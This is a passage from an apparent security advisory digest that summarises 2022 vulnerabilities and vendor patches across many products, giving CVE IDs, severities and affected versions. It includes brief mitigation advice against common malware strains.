Operations and VMware Workstation. A remote attacker can exploit these vulnerabilities to
take control of an affected system.
CVE ID: CVE-2022-22983 (Medium), CVE-2022-31672 (High), CVE-2022-31673 (Medium),
CVE-2022-31674 (Medium), CVE-2022-31675 (Medium)
Dell has released security updates to address multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Intel has released security updates to address multiple vulnerabilities in its products. An
attacker can exploit these vulnerabilities to take control of an affected system.
Citrix has released a security update to address a vulnerability in Citrix Hypervisor 7.1
LTSR CU2 that can allow privileged code in a PV guest VM to fail to perform management
operations.
CVE ID: CVE-2022-33745 (High)
It has been discovered that execution unit scheduler contention can lead to a side channel
vulnerability in AMD CPU microarchitectures codenamed "Zen 1", "Zen 2" and "Zen 3" that use
simultaneous multithreading (SMT). By measuring the contention level on scheduler queues, an
attacker can leak sensitive information.
CVE ID: CVE-2021-46778
Adobe has released security updates to address multiple vulnerabilities in its products. An
attacker can exploit some of these vulnerabilities to take control of an affected system.
CVE ID: CVE-2022-34253 (Critical), CVE-2022-34255, CVE-2022-34256, CVE-2022-34254,
CVE-2022-34257, CVE-2022-34258, CVE-2022-34259, CVE-2022-34260, CVE-2022-34261,
CVE-2022-34262, CVE-2022-34263, CVE-2022-34264, CVE-2022-35673, CVE-2022-35674,
CVE-2022-35675, CVE-2022-35676, CVE-2022-35677, CVE-2022-34235, CVE-2022-35665,
CVE-2022-35666, CVE-2022-35668, CVE-2022-35670, CVE-2022-35667, CVE-2022-35671,
CVE-2022-35678
Multiple memory corruption vulnerabilities have been discovered in the httpd unescape
functionality of FreshTomato. The affected version is FreshTomato 2022.1.
CVE ID: CVE-2022-28665 (Critical), CVE-2022-28664 (Critical)
An insufficient verification of data authenticity (OT:ICEFALL) vulnerability has been
discovered in Emerson's Equipment- ControlWave that can cause file manipulation, Remote Code
Execution (RCE), or Denial of Service (DoS).
CVE ID: CVE-2022-30262 (Critical)
Multiple OT:ICEFALL vulnerabilities have been discovered in Emerson's Equipment- OpenBSI
that can cause Remote Code Execution (RCE), change controller configuration, or cause a
Denial of Service (DoS) condition.
CVE ID: CVE-2022-29959 (Critical), CVE-2022-29960 (High)
Multiple vulnerabilities have been discovered in Zoom, affecting several of its platforms. An
attacker can exploit these vulnerabilities to take control of an affected system. The
updates are available.
CVE ID:
CVE-2022-34759, CVE-2022-34760, CVE-2022-34761, CVE-2022-34762,
CVE-2022-34763, CVE-2022-34764, CVE-2022-34765, CVE-2020-35198,
CVE-2020-28895, CVE-2021-22156, CVE-2021-22789, CVE-2021-22790,
CVE-2021-22791, CVE-2021-22792, CVE-2021-22778, CVE-2021-22779,
CVE-2021-22780, CVE-2021-22781, CVE-2021-22782,
CVE-2020-12525, CVE-2019-6843, CVE-2019-6844, CVE-2019-6846,
CVE-2019-6847, CVE-2019-6841, CVE-2019-6842, CVE-2018-7240,
CVE-2018-7241, CVE-2018-7242, CVE-2021-44228, CVE-2021-45046,
CVE-2021-45105, CVE-2021-4104,
CVE-2021-44832, CVE-2021-22786, CVE-2022-37302, CVE-2022-37301, CVE-2022-37300
Schneider Electric has released security updates to resolve multiple vulnerabilities in its
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-37300 (Critical), CVE-2022-37301 (High), CVE-2022-37302 (Medium),
CVE-2021-22786 (High)
A stack-based buffer overflow vulnerability has been discovered in Realtek eCos routers that
allows remote code execution (RCE) without authentication via a crafted SIP packet that
contains malicious SDP data. The affected versions are Realtek eCos RSDK 1.5.7p1 and MSDK
4.9.4p1.
CVE ID: CVE-2022-27255 (Critical)
NetApp has released security updates for StorageGRID deployed with a Linux kernel to address
a vulnerability which can allow a remote unauthenticated attacker to view limited metrics
information and modify alert email recipients and content.
CVE ID: CVE-2022-23238 (High)
A vulnerability has been discovered in SourceCodester Online Admission System that affects
unknown code of the component POST Parameter Handler. Manipulation of the argument shift
leads to SQL injection.
CVE ID: CVE-2022-2643 (Critical)
Debian has released security updates to resolve several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
A vulnerability has been discovered in Twitter that allowed someone to enter a phone number
or email address into the log-in flow in an attempt to learn if that information was tied to
an existing Twitter account, and if so, which specific account.
It has been discovered that the Simple Membership WordPress plugin allows users to change
their membership at the registration stage due to insufficient checking of a user supplied
parameter. The affected versions are Simple Membership WordPress plugin before 4.1.3.
CVE ID: CVE-2022-2317 (Critical)
F5 Networks has released security updates to address a vulnerability in BIG-IP Advanced WAF
and BIG-IP ASM systems that incorrectly handled certain requests.
HarmonyOS has released a security bulletin to address multiple vulnerabilities affecting
several Huawei phones and tablets that run HarmonyOS. Security patch levels of 2022-08-01 or
later address all of these issues.
It has been discovered that DedeCMS contains a Remote Code Execution (RCE) vulnerability via
the component mytag_main.php. The affected version is DedeCMS v5.7.95.
CVE ID: CVE-2022-34531 (Critical)
It has been discovered that Hiby R3 PRO firmware contains a file upload vulnerability via
the file upload feature. The affected versions are Hiby R3 PRO firmware v1.5 to v1.7.
CVE ID: CVE-2022-34496 (Critical)
An improper access control vulnerability has been discovered in SourceCodester Garage
Management System. The affected version is SourceCodester Garage Management System 1.0.
CVE ID: CVE-2022-2578 (Critical)
Google Play has released a security update to address an incorrect signature trust
vulnerability in the Google Play services SDK play-services-basement.
CVE ID: CVE-2022-1799 (Critical)
A URL restriction bypass vulnerability has been discovered in the GitHub repository
plantuml/plantuml that can cause Server Side Request Forgery (SSRF). The affected versions
are GitHub repository plantuml/plantuml prior to V1.2022.5.
CVE ID: CVE-2022-1379 (Critical)
Microsoft has released Microsoft Edge Stable Channel (Version 104.0.1293.47) to resolve
multiple vulnerabilities.
CVE ID: CVE-2022-33636 (High), CVE-2022-33649 (Critical), CVE-2022-35796 (High)
It has been discovered that the KUKA SystemSoftware V/KSS robot control systems of KUKA KR
C4 and KR C5 product lines are affected by an access control vulnerability in the WorkVisual
Service Host interface. The mitigations are available.
CVE ID: CVE-2022-2242 (Critical)
It has been discovered that Apache Hadoop's FileUtil.unTar(File, File) API does not escape
the input file name before it is passed to the shell. This vulnerability allows an attacker
to inject arbitrary commands.
CVE ID: CVE-2022-25168 (Critical)
The top malware strains observed in 2021 are Agent Tesla, AZORult, Formbook, Ursnif,
LokiBot, MOUSEISLAND, NanoCore, Qakbot, Remcos, TrickBot and GootLoader. Updates made by
malware developers, and reuse of code from these malware strains, contribute to the
malware's longevity and evolution into multiple variations. Critical infrastructure
organisations are urged to prepare for and mitigate potential cyber threats immediately by
updating software, enforcing multi-factor authentication (MFA), securing and monitoring RDP
and other potentially risky services, making offline backups of data and providing end-user
awareness and training.
A path traversal vulnerability via crafted HTTP request has been discovered in muhttpd
version 1.1.5 and earlier. A security update is available.
CVE ID: CVE-2022-31793
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
It has been discovered that an OMICARD EDM API function has an insufficient input
validation vulnerability that allows SQL injection to access, modify or delete the database,
or disrupt service.
CVE ID: CVE-2022-32964 (Critical)
It has been discovered that Pligg CMS contains a time-based SQL injection vulnerability via
the page_size parameter at load_data_for_groups.php. The affected version is Pligg CMS
v2.0.2.
CVE ID: CVE-2022-34956 (Critical)
An out of bounds write vulnerability due to uninitialized data has been discovered in
httpclient that can lead to remote escalation of privilege. The update is available.
CVE ID: CVE-2022-26437 (Critical)
An XML External Entity Injection (XXE) vulnerability has been discovered in IBM DataPower
Gateway. The affected versions are IBM DataPower Gateway 10.0.2.0 through 10.0.4.0, 10.0.1.0
through 10.0.1.8, 10.5.0.0, and 2018.4.1.0 through 2018.4.1.21.
CVE ID: CVE-2022-31775 (Critical)
It has been discovered that WMAgent v1.3.3rc2 and 1.3.3rc1, reqmgr 2 1.4.1rc5 and 1.4.0rc2,
reqmon 1.4.1rc5, and global-workqueue 1.4.1rc5 allow attackers to execute arbitrary code
via a crafted dbs-client package.
CVE ID: CVE-2022-34558 (Critical)
A Remote Code Execution (RCE) vulnerability via a crafted packet has been discovered in
TP-LINK TL-R473G 2.0.1 Build 220529 Rel.65574n.
CVE ID: CVE-2022-34555 (Critical)
A Server Side Template Injection (SSTI) vulnerability has been discovered in the ejs (aka
Embedded JavaScript templates) package for Node.js.
CVE ID: CVE-2022-29078 (Critical)
An execution with unnecessary privileges vulnerability has been discovered in Digi
International's Equipment- ConnectPort X2D Gateway that may result in malicious code
execution.
CVE ID: CVE-2022-2634 (Critical)
Huawei has released a security update to address an input verification vulnerability in
Huawei CV81-WDM FW products. Successful exploitation of this vulnerability can lead to DoS
attacks.
CVE ID: CVE-2022-37395 (High)
Dell has released security updates to address multiple vulnerabilities in Dell PowerScale
OneFS that can be exploited by malicious users to compromise the affected system.
CVE ID: CVE-2022-34369 (High), CVE-2022-34371 (High), CVE-2022-34378
(Medium)
Google has released Beta channel 105.0.5195.19 (Platform version: 14989.26.0) for most
ChromeOS devices, Chrome 105 (105.0.5195.19) Beta channel for Windows, Linux, and Mac,
Stable channel 104.0.5112.83 (Platform version: 14909.100.0) for most ChromeOS devices,
Chrome Beta 105 (105.0.5195.19) for iOS, and Chrome Beta 105 (105.0.5195.17) for Android to
resolve multiple vulnerabilities.
CVE ID: CVE-2022-2609 (High), CVE-2022-2620 (Medium), CVE-2022-2608 (High),
CVE-2022-2613 (Medium), CVE-2022-2607 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates are
available.
It has been discovered that OMICARD EDM has a hard-coded machine key. An unauthenticated
remote attacker can use this machine key to send serialized payload to the server to execute
arbitrary code, manipulate system data and disrupt service.
CVE ID: CVE-2022-32965 (Critical)
DrayTek has released a security update to address a Remote Code Execution (RCE)
vulnerability in DrayTek Vigor Routers. An attacker can exploit this vulnerability to take
control of an affected system.
CVE ID: CVE-2022-32548 (Critical)
Ubuntu has released security updates to resolve multiple vulnerabilities in NVIDIA graphics
drivers that can cause a Denial of Service (DoS) or possibly execute arbitrary code. The
affected products are Ubuntu 22.04, Ubuntu 20.04 & Ubuntu 18.04.
CVE ID: CVE-2022-31607, CVE-2022-31615, CVE-2022-31608
Synology has released security updates to address multiple vulnerabilities in its several
products.
CVE ID: CVE-2022-27618 (Medium), CVE-2022-27621 (Medium), CVE-2022-27620 (Medium),
CVE-2022-27619 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates are
available.
A prototype pollution vulnerability has been discovered in the GitHub repository
automattic/mongoose. The affected versions are GitHub repository automattic/mongoose prior
to 6.4.6.
CVE ID: CVE-2022-2564 (Critical)
A buffer overflow vulnerability has been discovered in the cgi component of Synology Audio
Station that allows remote attackers to execute arbitrary commands via unspecified vectors.
The affected versions are Synology Audio Station before 6.5.4-3367.
CVE ID: CVE-2022-27612 (Critical)
A buffer overflow vulnerability has been discovered in the cgi component of Synology Media
Server that allows remote attackers to execute arbitrary code via unspecified vectors. The
affected versions are Synology Media Server before 1.8.1-2876.
CVE ID: CVE-2022-22683 (Critical)
A vulnerability has been discovered in the PHP fileinfo functions which can lead to heap
corruption. The affected versions are PHP 8.1.x versions below 8.1.8.
CVE ID: CVE-2022-31627 (Critical)
An out of bounds read vulnerability has been discovered in Google Chrome that allows an
attacker who has compromised the renderer process to potentially perform a sandbox escape
via a crafted HTML page. The affected versions are Google Chrome prior to 102.0.5005.115.
CVE ID: CVE-2022-2010 (Critical)
An OS command injection vulnerability has been discovered in the OX App Suite. The affected
versions are OX App Suite through 7.10.6.
CVE ID: CVE-2022-24405 (Critical)
It has been discovered that a vulnerability in adm.cgi of WAVLINK WN535 G3
M35G3R.V5030.180927 allows attackers to execute arbitrary code via a crafted POST request.
CVE ID: CVE-2022-34577 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Zoho ManageEngine
Password Manager Pro before 12101 and PAM360 before 5510 & ManageEngine Access Manager Plus
before 4303.
CVE ID: CVE-2022-35405 (Critical)
Cisco has released security updates to resolve several vulnerabilities in multiple Cisco
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-20827 (Critical), CVE-2022-20841 (High), CVE-2022-20842 (Critical),
CVE-2022-20820 (Medium), CVE-2022-20852 (Medium), CVE-2022-20914 (Medium), CVE-2022-20816
(Medium), CVE-2022-20869 (Medium)
It has been discovered that the Intel RetBleed CPU vulnerability affects multiple F5
products and can allow information disclosure.
CVE ID: CVE-2022-29901 (Medium)
Ubuntu has released security updates to address several vulnerabilities in multiple
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
CVE ID: CVE-2022-34918 (High), CVE-2022-30783 (Medium), CVE-2022-30784 (Medium),
CVE-2022-30786 (Medium), CVE-2022-30788 (Medium), CVE-2022-30789 (Medium), CVE-2022-30785
(Medium), CVE-2022-30787 (Medium), CVE-2022-1679 (High), CVE-2022-28893 (High),
CVE-2022-1652 (High)
Multiple Cross-Site Request Forgery (CSRF) vulnerabilities have been discovered in the
uContext for Clickbank, uContext for Amazon, Link Optimizer Lite, and Banner Cycler
WordPress plugins.
CVE ID: CVE-2022-2542 (High), CVE-2022-2541 (High), CVE-2022-2540 (High),
CVE-2022-2233 (High)
Dell has released security updates to address multiple vulnerabilities in third-party
components that affect Dell Data Computing Appliance (DCA). An attacker can exploit these
vulnerabilities to take control of an affected system.
Multiple vulnerabilities have been discovered in several Fortinet products. Security updates
are available.
CVE ID: CVE-2022-27484 (Medium), CVE-2022-23442 (Medium), CVE-2022-22299
(High)
NVIDIA has released security updates for NVIDIA GPU Display Driver to address multiple
vulnerabilities that can lead to Denial of Service (DoS), information disclosure, escalation
of privileges, code execution, or data tampering.
Google has released Beta channel 104.0.5112.83 (Platform version: 14909.100.0) for most
ChromeOS devices, Chrome Dev 105 (105.0.5195.17) for Android, Chrome Stable 104
(104.0.5112.71) for iOS, Chrome 104 (104.0.5112.69) for Android, and Chrome 104.0.5112.79
(Mac/Linux) and 104.0.5112.79/80/81 (Windows) to resolve multiple vulnerabilities.
CVE ID: CVE-2022-2603, CVE-2022-2604, CVE-2022-2605, CVE-2022-2606, CVE-2022-2607,
CVE-2022-2608, CVE-2022-2609, CVE-2022-2610, CVE-2022-2611, CVE-2022-2612,
CVE-2022-2613, CVE-2022-2614, CVE-2022-2615, CVE-2022-2616, CVE-2022-2617, CVE-2022-2618,
CVE-2022-2619, CVE-2022-2620, CVE-2022-2621, CVE-2022-2622, CVE-2022-2623, CVE-2022-2624
It has been discovered that the cookie deserialization function of EasyUse MailHunter
Ultimate has an inadequate validation vulnerability that allows an unauthenticated remote
attacker to execute arbitrary code, manipulate system commands or interrupt service.
CVE ID: CVE-2022-35223 (Critical)
An incorrect access control vulnerability has been discovered in HashiCorp product Vault
Enterprise. The affected products are Vault Enterprise 1.7.0 through 1.9.7, 1.10.4, and
1.11.0.
CVE ID: CVE-2022-36129 (Critical)
It has been discovered that in mistune the support of inline markup is implemented by using
regular expressions that can involve a high amount of backtracking on certain edge cases.
The affected versions are mistune through 2.0.2.
CVE ID: CVE-2022-34749 (Critical)
Mitsubishi Electric has released security updates to address OpenSSL vulnerabilities in its
GT SoftGOT2000 product that can cause Denial of Service (DoS) and arbitrary command
execution. The affected product is GT SoftGOT2000 version 1.275M.
CVE ID: CVE-2022-1292 (Critical), CVE-2022-0778 (High)
Multiple vulnerabilities such as buffer overflow, command injection, information disclosure,
Denial of Service (DoS), and hard-coded credentials have been discovered in TCL LinkHub Mesh
Wi-Fi system.
GitLab has released Community Edition and Enterprise Edition version 15.2.2 to resolve a
number of regressions and bugs in 15.2 release and prior versions.
Android has released a security bulletin to resolve multiple vulnerabilities affecting
several Android devices. Security patch levels of 2022-08-05 or later address all of these
issues.
NetApp has released security updates to resolve multiple vulnerabilities in several NetApp
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
OpenStack Manila has released security updates to address a vulnerability in OpenStack
Manila when it owns a Ceph File System "share", which can compromise the confidentiality
and integrity of a file system. The vulnerability has been fixed in RHCS 5.2 and Ceph
17.2.2.
CVE ID: CVE-2022-0670 (Critical)
A vulnerability has been discovered in Joplin that allows attackers to execute arbitrary
commands via a crafted payload injected into the Node titles. The affected version is Joplin
v2.8.8.
CVE ID: CVE-2022-35131 (Critical)
A vulnerability has been discovered in OpenKM Community Edition which allows an attacker to
perform a XML external entity injection attack. The affected version is OpenKM Community
Edition 6.3.10 and before.
CVE ID: CVE-2022-2131 (Critical)
It has been discovered that software/apt-lib.pl in Webmin lacks HTML escaping for a UI
command. The affected versions are Webmin prior to 1.997.
CVE ID: CVE-2022-36446 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Atos Unify OpenScape that
can compromise the confidentiality and integrity of the system. The affected versions are
Atos Unify OpenScape SBC 9 and 10 before 10R2.2.1, Atos Unify OpenScape Branch 9 and 10
before version 10R2.1.1, and Atos Unify OpenScape BCF 10 before 10R9.12.1.
CVE ID: CVE-2022-36444 (Critical)
It has been discovered that the Cab fare calculator WordPress plugin does not validate the
controller parameter before using it in require statements, which can lead to Local File
Inclusion (LFI) vulnerability. The affected versions are Cab fare calculator WordPress
plugin before 1.0.4.
CVE ID: CVE-2022-1391 (Critical)
Dell has released security updates to address multiple authentication bypass vulnerabilities
in its products. The affected products are Dell PowerProtect Cyber Recovery, and Dell
CloudLink.
CVE ID: CVE-2022-34372 (Critical), CVE-2022-34380 (Critical), CVE-2022-34379
(Critical)
It has been discovered that Obsidian allows obsidian://hook-get-address remote code
execution vulnerability because window.open is used without checking the URL. The affected
versions are Obsidian 0.14.x and 0.15.x before 0.15.5.
CVE ID: CVE-2022-36450 (Critical)
A vulnerability has been discovered in the /api/plugin/upload component of Dataease that
allows attackers to execute arbitrary code via a crafted plugin. The affected version is
Dataease v1.11.1.
CVE ID: CVE-2022-34113 (Critical)
Multiple Unauthenticated SQL Injection (SQLi) vulnerabilities have been discovered in
Osamaesh WP Visitor Statistics plugin of WordPress. The affected versions are Osamaesh WP
Visitor Statistics plugin including 5.7 and below.
CVE ID: CVE-2022-33965 (Critical)
WordPress has released a security update to address a Cross-Site Scripting vulnerability in
the Simple SEO plugin for WordPress. The affected versions are Simple SEO versions up to,
and including, 1.7.91.
CVE ID: CVE-2022-1628 (Medium)
NetApp has released security updates to resolve multiple vulnerabilities in several NetApp
products. An attacker can exploit these vulnerabilities to take control of an affected
system.
Ubuntu has released security updates to resolve multiple vulnerabilities in Linux kernel.
The affected products are Ubuntu 16.04 ESM, and Ubuntu 14.04 ESM.
CVE ID: CVE-2022-20141 (High), CVE-2022-25258 (Medium), CVE-2022-25375 (Medium),
CVE-2022-34918 (High)
Foxit has released Foxit PDF Reader 12.0.1 and Foxit PDF Editor 12.0.1 for the Windows
platform to resolve multiple vulnerabilities in Foxit PDF Reader version 12.0.0.12394 and
earlier, and in Foxit PDF Editor version 12.0.0.12394, 11.2.2.53575 and all previous 11.x
versions, and 10.1.8.37795 and earlier. Foxit has also released Foxit PDF Editor for Mac
12.0.1 and Foxit PDF Reader for Mac 12.0.1 to resolve multiple vulnerabilities in Foxit PDF
Editor for Mac versions 12.0.0.0601, 11.1.2.0420 and earlier, and in Foxit PDF Reader for
Mac versions 12.0.0.0601, 11.1.2.0420 and earlier.
A Denial of Service (DoS) vulnerability has been discovered in Yokogawa CENTUM controller
FCS. The affected products are CENTUM VP, and CENTUM CS 3000 controller FCS.
CVE ID: CVE-2022-33939 (Medium)
GitLab has released updated versions 15.2.1, 15.1.4, and 15.0.5 for GitLab Community Edition
(CE) and Enterprise Edition (EE) to resolve multiple vulnerabilities.
Mozilla has released security updates to address multiple vulnerabilities in Thunderbird
102.1, and Thunderbird 91.12. An attacker can exploit these vulnerabilities to take control
of an affected system.
CVE ID: CVE-2022-36319 (Medium), CVE-2022-36318 (Medium), CVE-2022-36314 (Medium),
CVE-2022-2505 (High)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
A type confusion vulnerability has been discovered in Rockwell Automation's FactoryTalk
software, Enhanced HIM for PowerFlex, and Connected Components Workbench that can cause a
Denial of Service condition. The affected products are FactoryTalk Linx Enterprise software
versions 6.20, 6.21, and 6.30, Enhanced HIM (eHIM) for PowerFlex 6000T version 1.001,
Connected Components Workbench software versions 11, 12, 13, and 20, and FactoryTalk View
Site Edition version 13.
CVE ID: CVE-2022-1096 (Medium)
Google Chrome has released Dev channel 105.0.5195.10 for Windows, Mac and Linux, Chrome Beta
105 (105.0.5195.7) for iOS, and Chrome Dev 105 (105.0.5195.8) for Android.
Multiple vulnerabilities have been discovered in PyPI packages, each consisting of a code
execution backdoor inserted by a third party.
CVE ID: CVE-2022-34983 (Critical), CVE-2022-34982 (Critical), CVE-2022-34981
(Critical), CVE-2022-34509 (Critical), CVE-2022-34501 (Critical), CVE-2022-34500
(Critical)
It has been discovered that the Apache Xalan Java XSLT library is vulnerable to an integer
truncation vulnerability when processing malicious XSLT stylesheets. This can be used to
corrupt Java class files generated by the internal XSLTC compiler and execute arbitrary Java
bytecode.
CVE ID: CVE-2022-34169 (Critical)
An arbitrary file upload vulnerability has been discovered in the file upload component of
ButterCMS that allows attackers to execute arbitrary code via a crafted SVG file. The
affected version is ButterCMS v1.2.8.
CVE ID: CVE-2022-27260 (Critical)
Red Hat has released security updates to address multiple vulnerabilities in Red Hat
OpenShift Enterprise ASYNC Stream container images. The affected product is Red Hat
OpenShift Container Platform 4.6 for RHEL 8 x86_64.
CVE ID: CVE-2020-29368 (High), CVE-2022-27666 (High), CVE-2022-1012, CVE-2022-1729,
CVE-2022-32250 (High)
Samba has released security updates to address multiple vulnerabilities in several versions
of Samba. An attacker can exploit one of these vulnerabilities to take control of an
affected system.
CVE ID: CVE-2022-2031 (Medium), CVE-2022-32742 (Medium), CVE-2022-32744 (High),
CVE-2022-32745 (Medium), CVE-2022-32746 (Medium)
CODESYS has released security updates to address multiple vulnerabilities in several CODESYS
products. The affected products are CODESYS Development System prior to version V3.5.17.10,
CODESYS Installer prior to version V1.3.0, CODESYS SVN prior to version V4.4.0.0, and the
CODESYS Development System V3 setup from V3.5.17.0 and before V3.5.18.20.
CVE ID: CVE-2021-21863 (High), CVE-2021-21864 (High), CVE-2021-21865 (High),
CVE-2021-21866 (High), CVE-2021-21867 (High), CVE-2021-21868 (High), CVE-2021-21869
(High)
Multiple vulnerabilities have been discovered in several Jenkins Plugins. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Dell has released security updates to address multiple vulnerabilities in several products.
An attacker can exploit these vulnerabilities to take control of an affected system.
Google Chrome has released Beta channel 104.0.5112.65 for Windows, Mac and Linux, Chrome
Beta 104 (104.0.5112.69) for Android, Dev channel 105.0.5195.5 (Platform version:
14989.11.0) for most ChromeOS devices, and LTS channel 96.0.4664.215 (Platform Version:
14268.94.0) for most ChromeOS devices to resolve multiple vulnerabilities.
CVE ID: CVE-2022-2010 (High), CVE-2022-1488 (Medium), CVE-2021-30560 (Medium),
CVE-2022-29824 (Medium)
Multiple vulnerabilities have been discovered in several IBM products. An attacker can
exploit these vulnerabilities to take control of an affected system. The updates are
available.
Multiple vulnerabilities have been discovered in several NetApp products. An attacker can
exploit these vulnerabilities to take control of an affected system. Security updates are
available.
It has been discovered that an insufficient policy enforcement vulnerability in the
developer tools of Google Chrome allowed a remote attacker to potentially perform a sandbox
escape via a crafted HTML page. The affected versions are Google Chrome prior to
100.0.4896.88.
CVE ID: CVE-2022-1309 (Critical)
An authorization bypass vulnerability has been discovered in the web page "wizardpwd.asp"
of an ALLNET router. The affected version is ALLNET Router model WR0500AC.
CVE ID: CVE-2022-34767 (Critical)
Multiple vulnerabilities have been discovered in Cisco Nexus Dashboard which allow execution
of arbitrary commands, read or upload container image files, or perform a Cross-Site Request
Forgery (CSRF) attack.
CVE ID: CVE-2022-20858 (Critical), CVE-2022-20857 (Critical)
It has been discovered that Wavlink WN530HG4 M30HG4.V5030.191116 contains a hardcoded
encryption/decryption key for its configuration files at
/etc_ro/lighttpd/www/cgi-bin/ExportAllSettings.sh.
CVE ID: CVE-2022-34045 (Critical)
It has been discovered that Goldshell ASIC Miners contain a hard-coded credentials
vulnerability which allows attackers to remotely connect via the SSH protocol (port 22). The
affected version is Goldshell ASIC Miners v2.1.x.
CVE ID: CVE-2022-24657 (Critical)
It has been discovered that an on-premise installation of the Pega Platform, if the port
configured for its JMX interface is exposed to the Internet, can allow the upload of
serialized payloads, as port filtering is not properly configured in the system.
CVE ID: CVE-2022-24082 (Critical)
A vulnerability has been discovered in Easergy P5 version V01.401.102 and prior that can
result in Remote Code Execution (RCE) or a crash of the HTTPS stack used by the web HMI of
the device.
CVE ID: CVE-2022-34756 (Critical)
A SQL injection vulnerability has been discovered in the lux extension for TYPO3. The
affected versions are TYPO3 lux extension before 17.6.1, and 18.x through 24.x before
24.0.2.
CVE ID: CVE-2022-35628 (Critical)
It has been discovered that FreeType commit 1e2eb65048f75c64b68708efed6ce904c31f3b2f
contains a heap buffer overflow vulnerability via the function sfnt_init_face.
CVE ID: CVE-2022-27404 (Critical)
A memory corruption vulnerability has been discovered in the cgi.c unescape functionality of
ArduPilot APWeb master branch 50b6b7ac - master branch 46177cb9.
CVE ID: CVE-2022-28711 (Critical)
It has been discovered that COVID19 Testing Management System contains a SQL injection
vulnerability via the admin panel. The affected version is COVID19 Testing Management
System 1.0.
CVE ID: CVE-2021-33470 (Critical)
It has been discovered that in Octopus Deploy the Octopus variables that are sourced from
the target do not have sensitive values obfuscated in the deployment logs. The affected
versions are Octopus Deploy 2018.4.4 through 2018.5.1.
CVE ID: CVE-2018-11320 (Critical)
It has been discovered that multiple vulnerabilities in Node.js affect F5 products. An
attacker can exploit these vulnerabilities to perform domain hijacking or injection attacks.
The affected products are BIG-IP (all modules), and BIG-IQ Centralized Management.
CVE ID: CVE-2021-3672 (Medium), CVE-2021-22931 (Critical)
Multiple vulnerabilities have been discovered in ABB Ability(TM) Operations Data Management
Zenon. Successful exploitation can allow attackers to log additional messages and access
files from the Zenon system. The affected versions are all Zenon versions up to 8.20.
CVE ID: CVE-2022-34836 (Medium), CVE-2022-34837 (Medium), CVE-2022-34838
(High)
An authentication bypass vulnerability has been discovered in CodexShaper's WP OAuth2 Server
plugin for WordPress. The affected versions are CodexShaper's WP OAuth2 Server plugin 1.0.1
and below.
CVE ID: CVE-2022-34839 (Critical)
Honeywell has released security updates to address multiple OT:ICEFALL vulnerabilities in
Honeywell's Saia Burgess PG5 PCD equipment that can allow configuration manipulation.
CVE ID: CVE-2022-30319 (High), CVE-2022-30320 (High)
Honeywell has released security updates to address multiple vulnerabilities in Honeywell's
Safety Manager equipment that can allow configuration and firmware manipulation or Remote
Code Execution (RCE).
CVE ID: CVE-2022-30313 (High), CVE-2022-30314 (High), CVE-2022-30315 (High),
CVE-2022-30316 (High)
MOXA has released security updates to address multiple out-of-bounds write vulnerabilities
in MOXA's NPort 5110 equipment that can allow an attacker to change memory values and/or
cause the device to become unresponsive.
CVE ID: CVE-2022-2044 (High), CVE-2022-2043 (High)
Inductive Automation has released security updates to address an improper restriction of XML
External Entity Reference vulnerability in Inductive Automation's Ignition equipment that
can allow an attacker to obtain file contents.
CVE ID: CVE-2022-1704 (High)
Dell has released security updates to address several vulnerabilities in its products. The
affected products are Dell Command | Integration Suite for System Center, Dell Secure
Connect Gateway, and Dell Policy Manager for Secure Connect Gateway.
CVE ID: CVE-2022-34373 (High)
Mozilla has released security updates to address multiple vulnerabilities in Firefox ESR
102.1, Firefox ESR 91.12, and Firefox 103. An attacker can exploit these vulnerabilities to
take control of an affected system.
Multiple vulnerabilities have been discovered in IBM products. An attacker can exploit these
vulnerabilities to take control of an affected system. The updates are available.
McAfee has released a security update to address a DLL hijacking vulnerability in the McAfee
Agent (MA) Smart Installer for Windows. The affected versions are McAfee Agent (MA) Smart
Installer for Windows prior to 5.7.7.
CVE ID: CVE-2022-2313 (High)
A vulnerability has been discovered in WAVLINK WN535K2 and WN535K3 that affects unknown code
of the file /cgi-bin/nightled.cgi. Manipulation of the argument start_hour leads to an OS
command injection vulnerability.
CVE ID: CVE-2022-2487 (Critical)
A vulnerability has been discovered in WAVLINK WN535K2 and WN535K3 that affects an unknown
part of the file /cgi-bin/mesh.cgi?page=upgrade. Manipulation of the argument key leads to
an OS command injection vulnerability.
CVE ID: CVE-2022-2486 (Critical)
It has been discovered that the mstatus.sd field in CVA6 commit
d315ddd0f1be27c1b3f27eb0b8daf471a952299a does not update when the mstatus.fs field is set to
Dirty.
CVE ID: CVE-2022-34635 (Critical)
It has been discovered that Rocket-Chip commit 4f8114374d8824dfdec03f576a8cd68bebce4e56
contains an insufficient cryptography vulnerability via the component
/rocket/RocketCore.scala.
CVE ID: CVE-2022-34632 (Critical)
A Remote Command Execution (RCE) vulnerability has been discovered in Spryker Commerce. The
affected version is Spryker Commerce OS 1.4.2.
CVE ID: CVE-2022-28888 (Critical)
It has been discovered that WolfSSH contains an integer overflow vulnerability via the
function wolfSSH_SFTP_RecvRMDIR. The affected version is WolfSSH v1.4.7.
CVE ID: CVE-2022-32073 (Critical)
A Remote Code Execution (RCE) vulnerability has been discovered in Roxy-WI. The affected
versions are Roxy-WI versions prior to 6.1.1.0.
CVE ID: CVE-2022-31137 (Critical)
A heap-based buffer over-read vulnerability has been discovered in singlevar in lparser.c in
Lua. The affected versions are Lua from (including) 5.4.0 up to (excluding) 5.4.4.
CVE ID: CVE-2022-28805 (Critical)
Ubuntu has released security updates to address several vulnerabilities in multiple
